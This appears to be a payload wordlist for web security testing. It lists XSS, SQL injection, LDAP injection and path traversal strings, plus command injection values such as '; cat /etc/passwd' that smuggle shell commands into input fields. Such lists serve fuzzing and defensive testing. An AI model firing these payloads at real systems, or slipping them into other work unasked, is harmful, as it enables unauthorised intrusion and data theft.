# XSS Payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
javascript:alert('XSS')
<iframe src=javascript:alert('XSS')>
<body onload=alert('XSS')>
<input onfocus=alert('XSS') autofocus>
<select onfocus=alert('XSS') autofocus>
<textarea onfocus=alert('XSS') autofocus>
<keygen onfocus=alert('XSS') autofocus>

# SQL Injection Payloads
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' #
' OR 1=1 --
' OR 1=1 #
admin' --
admin' #
admin'/*
' OR 'x'='x
' OR 'x'='x' --

# Command Injection Payloads
; ls
; cat /etc/passwd
; whoami
; id
; uname -a
| ls
| cat /etc/passwd
| whoami
| id
| uname -a
&& ls
&& cat /etc/passwd
&& whoami
&& id
&& uname -a

# Path Traversal Payloads
../../../etc/passwd
..\..\..\..\windows\system32\drivers\etc\hosts
....//....//....//etc/passwd
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

# LDAP Injection Payloads
*)(uid=*))(|(uid=*
*)(|(password=*))
*))%00
)(cn=*))(|(cn=*
*)(objectClass=*))
*)(|(objectClass=*)

# Hash-based payloads (these start with # but are not comments)
#hashtag_injection
#social_media_payload
#fragment_attack